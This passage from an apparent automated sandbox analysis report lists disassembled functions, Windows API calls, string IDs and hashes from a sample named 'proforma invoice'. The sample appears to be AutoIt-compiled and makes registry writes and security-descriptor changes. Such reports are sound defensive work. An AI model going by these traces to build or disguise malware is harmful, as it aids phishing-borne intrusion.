                  • Instruction ID: 3db7a3611a2818cc1b0039826f74919013555ab0231e98a53c9140aab5e879e9
                  • Opcode Fuzzy Hash: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
                  • Instruction Fuzzy Hash: 40129E31200205EFD725DF68C944BB9BBF9FB44300F148469F6999B262CB35EC92DB91
                  APIs
                  • DestroyWindow.USER32(00000000), ref: 00B2273E
                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B2286A
                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B228A9
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B228B9
                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B22900
                  • GetClientRect.USER32(00000000,?), ref: 00B2290C
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B22955
                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B22964
                  • GetStockObject.GDI32(00000011), ref: 00B22974
                  • SelectObject.GDI32(00000000,00000000), ref: 00B22978
                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B22988
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B22991
                  • DeleteDC.GDI32(00000000), ref: 00B2299A
                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B229C6
                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B229DD
                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B22A1D
                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B22A31
                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B22A42
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B22A77
                  • GetStockObject.GDI32(00000011), ref: 00B22A82
                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B22A8D
                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B22A97
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                  • API String ID: 2910397461-517079104
                  • Opcode ID: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
                  • Instruction ID: 2da448dcdabc46b93cb06d07a6c08f88f151445bb0d052f39d928260d156357e
                  • Opcode Fuzzy Hash: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
                  • Instruction Fuzzy Hash: 0AB17E71A00215BFEB14DFA8DC86EAE7BB9EB08710F104554F919EB2A1DB70ED40CB64
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B14AED
                  • GetDriveTypeW.KERNEL32(?,00B3CB68,?,\\.\,00B3CC08), ref: 00B14BCA
                  • SetErrorMode.KERNEL32(00000000,00B3CB68,?,\\.\,00B3CC08), ref: 00B14D36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$DriveType
                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                  • API String ID: 2907320926-4222207086
                  • Opcode ID: c9318b9f683b79abb84aded647d7f13eff12888dd489601c41cb99a9298b0b99
                  • Instruction ID: aa5e35480434087a806baf32da070a510cc5be5324fdf25e885a76947ab3c825
                  • Opcode Fuzzy Hash: c9318b9f683b79abb84aded647d7f13eff12888dd489601c41cb99a9298b0b99
                  • Instruction Fuzzy Hash: 8461B030605106EBCB04DF24CAC1DEDB7E0EB46740BA484E5F806AB2A1DB39ED81DB81
                  APIs
                  • GetSysColor.USER32(00000012), ref: 00B37421
                  • SetTextColor.GDI32(?,?), ref: 00B37425
                  • GetSysColorBrush.USER32(0000000F), ref: 00B3743B
                  • GetSysColor.USER32(0000000F), ref: 00B37446
                  • CreateSolidBrush.GDI32(?), ref: 00B3744B
                  • GetSysColor.USER32(00000011), ref: 00B37463
                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
                  • SelectObject.GDI32(?,00000000), ref: 00B37482
                  • SetBkColor.GDI32(?,00000000), ref: 00B3748B
                  • SelectObject.GDI32(?,?), ref: 00B37498
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B3752A
                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B37554
                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00B37572
                  • DrawFocusRect.USER32(?,?), ref: 00B3757D
                  • GetSysColor.USER32(00000011), ref: 00B3758E
                  • SetTextColor.GDI32(?,00000000), ref: 00B37596
                  • DrawTextW.USER32(?,00B370F5,000000FF,?,00000000), ref: 00B375A8
                  • SelectObject.GDI32(?,?), ref: 00B375BF
                  • DeleteObject.GDI32(?), ref: 00B375CA
                  • SelectObject.GDI32(?,?), ref: 00B375D0
                  • DeleteObject.GDI32(?), ref: 00B375D5
                  • SetTextColor.GDI32(?,?), ref: 00B375DB
                  • SetBkColor.GDI32(?,?), ref: 00B375E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                  • String ID:
                  • API String ID: 1996641542-0
                  • Opcode ID: 938adfcc7a08023f4eb774986a1a85dfd5279560727c96855434ea4a120bd86d
                  • Instruction ID: aa7383f9480a977e2757e91727bb9c47e23097a32de8f9fbfed9978cac7c4882
                  • Opcode Fuzzy Hash: 938adfcc7a08023f4eb774986a1a85dfd5279560727c96855434ea4a120bd86d
                  • Instruction Fuzzy Hash: 80616A72900218AFDF119FA4DC49EEEBFB9EB08320F214155F915BB2A1DB75A940DB90
                  APIs
                  • GetCursorPos.USER32(?), ref: 00B31128
                  • GetDesktopWindow.USER32 ref: 00B3113D
                  • GetWindowRect.USER32(00000000), ref: 00B31144
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B31199
                  • DestroyWindow.USER32(?), ref: 00B311B9
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B311ED
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B3120B
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B3121D
                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00B31232
                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B31245
                  • IsWindowVisible.USER32(00000000), ref: 00B312A1
                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B312BC
                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B312D0
                  • GetWindowRect.USER32(00000000,?), ref: 00B312E8
                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00B3130E
                  • GetMonitorInfoW.USER32(00000000,?), ref: 00B31328
                  • CopyRect.USER32(?,?), ref: 00B3133F
                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 00B313AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                  • String ID: ($0$tooltips_class32
                  • API String ID: 698492251-4156429822
                  • Opcode ID: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
                  • Instruction ID: f1491cb685e7be85f2bef20a734a28651aa3c35138805a40feca7f3089243570
                  • Opcode Fuzzy Hash: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
                  • Instruction Fuzzy Hash: EBB17C71604341AFD704DF68C985B6FBBE8FF85350F108958F999AB2A1CB31E844CBA1
                  APIs
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB8968
                  • GetSystemMetrics.USER32(00000007), ref: 00AB8970
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB899B
                  • GetSystemMetrics.USER32(00000008), ref: 00AB89A3
                  • GetSystemMetrics.USER32(00000004), ref: 00AB89C8
                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AB89E5
                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AB89F5
                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AB8A28
                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AB8A3C
                  • GetClientRect.USER32(00000000,000000FF), ref: 00AB8A5A
                  • GetStockObject.GDI32(00000011), ref: 00AB8A76
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB8A81
                    • Part of subcall function 00AB912D: GetCursorPos.USER32(?), ref: 00AB9141
                    • Part of subcall function 00AB912D: ScreenToClient.USER32(00000000,?), ref: 00AB915E
                    • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000001), ref: 00AB9183
                    • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000002), ref: 00AB919D
                  • SetTimer.USER32(00000000,00000000,00000028,00AB90FC), ref: 00AB8AA8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                  • String ID: AutoIt v3 GUI
                  • API String ID: 1458621304-248962490
                  • Opcode ID: b1cd0c0797910ff938be22df13e6203af2facc8d1e48beb2ac0d9233ecb9fccd
                  • Instruction ID: 7c2d173481e8de47f4fc9db8ef6e4b8cf86487ee16beed05953a8721c30ee8ab
                  • Opcode Fuzzy Hash: b1cd0c0797910ff938be22df13e6203af2facc8d1e48beb2ac0d9233ecb9fccd
                  • Instruction Fuzzy Hash: D3B16B71A00209AFDF14DFACCD46BEE7BB9FB48314F114229FA15A7291DB34A841CB61
                  APIs
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                    • Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                    • Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                    • Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00DF5
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00E29
                  • GetLengthSid.ADVAPI32(?), ref: 00B00E40
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B00E7A
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00E96
                  • GetLengthSid.ADVAPI32(?), ref: 00B00EAD
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00EB5
                  • HeapAlloc.KERNEL32(00000000), ref: 00B00EBC
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00EDD
                  • CopySid.ADVAPI32(00000000), ref: 00B00EE4
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00F13
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00F35
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00F47
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F6E
                  • HeapFree.KERNEL32(00000000), ref: 00B00F75
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F7E
                  • HeapFree.KERNEL32(00000000), ref: 00B00F85
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F8E
                  • HeapFree.KERNEL32(00000000), ref: 00B00F95
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B00FA1
                  • HeapFree.KERNEL32(00000000), ref: 00B00FA8
                    • Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
                    • Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
                    • Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
                  • Instruction ID: 3b82d2801aca08d53d167a615eec04e00b986dcc13c59de380610a65774f45a2
                  • Opcode Fuzzy Hash: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
                  • Instruction Fuzzy Hash: E6715B7290020AEBDB20AFA4DC48FAEBFB8FF05301F244195FA59B7191DB719905DB60
                  APIs
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2C4BD
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B3CC08,00000000,?,00000000,?,?), ref: 00B2C544
                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B2C5A4
                  • _wcslen.LIBCMT ref: 00B2C5F4
                  • _wcslen.LIBCMT ref: 00B2C66F
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B2C6B2
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B2C7C1
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B2C84D
                  • RegCloseKey.ADVAPI32(?), ref: 00B2C881
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2C88E
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B2C960
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                  • API String ID: 9721498-966354055
                  • Opcode ID: 8136c3eb651b8de4711d4108d3fd2870d847eee1c734cf4112f307a6c3c61af5
                  • Instruction ID: 1a4dbdb51c90855f2069d9a0fd21cc94dfd9595b7bafd2d53065c8e3765e5fb2
                  • Opcode Fuzzy Hash: 8136c3eb651b8de4711d4108d3fd2870d847eee1c734cf4112f307a6c3c61af5
                  • Instruction Fuzzy Hash: C41278356042119FDB14EF14D991E2EBBE5EF89714F14889CF88A9B3A2DB31ED41CB81
                  APIs
                  • CharUpperBuffW.USER32(?,?), ref: 00B309C6
                  • _wcslen.LIBCMT ref: 00B30A01
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B30A54
                  • _wcslen.LIBCMT ref: 00B30A8A
                  • _wcslen.LIBCMT ref: 00B30B06
                  • _wcslen.LIBCMT ref: 00B30B81
                    • Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD
                    • Part of subcall function 00B02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B02BFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$MessageSend$BuffCharUpper
                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                  • API String ID: 1103490817-4258414348
                  • Opcode ID: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
                  • Instruction ID: 223c2041871d91c53dbc0e987ddcfc94b269ecd9ff45a1bf41b3d5ee708cabf2
                  • Opcode Fuzzy Hash: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
                  • Instruction Fuzzy Hash: CFE19E352183019FC714EF24C5A096AB7E1FF99714F2489ACF8969B3A2DB31ED45CB81
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                  • API String ID: 1256254125-909552448
                  • Opcode ID: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
                  • Instruction ID: 79e1a1e8ef10d396728ac4626a540eac3ad9546544b83b75be4aa1ed6b820797
                  • Opcode Fuzzy Hash: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
                  • Instruction Fuzzy Hash: 4971143360013A8BCB20DE7CED515BE3BD1EF65754B2505A8F86E97288EA35CD4583A0
                  APIs
                  • _wcslen.LIBCMT ref: 00B3835A
                  • _wcslen.LIBCMT ref: 00B3836E
                  • _wcslen.LIBCMT ref: 00B38391
                  • _wcslen.LIBCMT ref: 00B383B4
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B383F2
                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B3361A,?), ref: 00B3844E
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38487
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B384CA
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38501
                  • FreeLibrary.KERNEL32(?), ref: 00B3850D
                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B3851D
                  • DestroyIcon.USER32(?), ref: 00B3852C
                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B38549
                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B38555
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                  • String ID: .dll$.exe$.icl
                  • API String ID: 799131459-1154884017
                  • Opcode ID: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
                  • Instruction ID: dfffb13f4189ad98b1e1a2abc5ae5a877a2663d978d20cfab76abba7aafa3e8b
                  • Opcode Fuzzy Hash: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
                  • Instruction Fuzzy Hash: FF61B071540315BAEB14DF64CC85BBE7BA8FB18B11F204689F815E61D1DF74A984CBA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                  • API String ID: 0-1645009161
                  • Opcode ID: 71babf912802ee9e1b312e72ed1659cb45ef0994f7f80933edd7a967dcdd1766
                  • Instruction ID: 8dbea50abb69914d29e20ed40b8853977e1cc17df4de729d1b759e88f74a9a81
                  • Opcode Fuzzy Hash: 71babf912802ee9e1b312e72ed1659cb45ef0994f7f80933edd7a967dcdd1766
                  • Instruction Fuzzy Hash: 5E81E071A04605BBDB20BF61DD42FBF3BA8AF16300F144068F905AB1E2EB74DA51D7A1
                  APIs
                  • LoadIconW.USER32(00000063), ref: 00B05A2E
                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B05A40
                  • SetWindowTextW.USER32(?,?), ref: 00B05A57
                  • GetDlgItem.USER32(?,000003EA), ref: 00B05A6C
                  • SetWindowTextW.USER32(00000000,?), ref: 00B05A72
                  • GetDlgItem.USER32(?,000003E9), ref: 00B05A82
                  • SetWindowTextW.USER32(00000000,?), ref: 00B05A88
                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B05AA9
                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B05AC3
                  • GetWindowRect.USER32(?,?), ref: 00B05ACC
                  • _wcslen.LIBCMT ref: 00B05B33
                  • SetWindowTextW.USER32(?,?), ref: 00B05B6F
                  • GetDesktopWindow.USER32 ref: 00B05B75
                  • GetWindowRect.USER32(00000000), ref: 00B05B7C
                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B05BD3
                  • GetClientRect.USER32(?,?), ref: 00B05BE0
                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00B05C05
                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B05C2F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
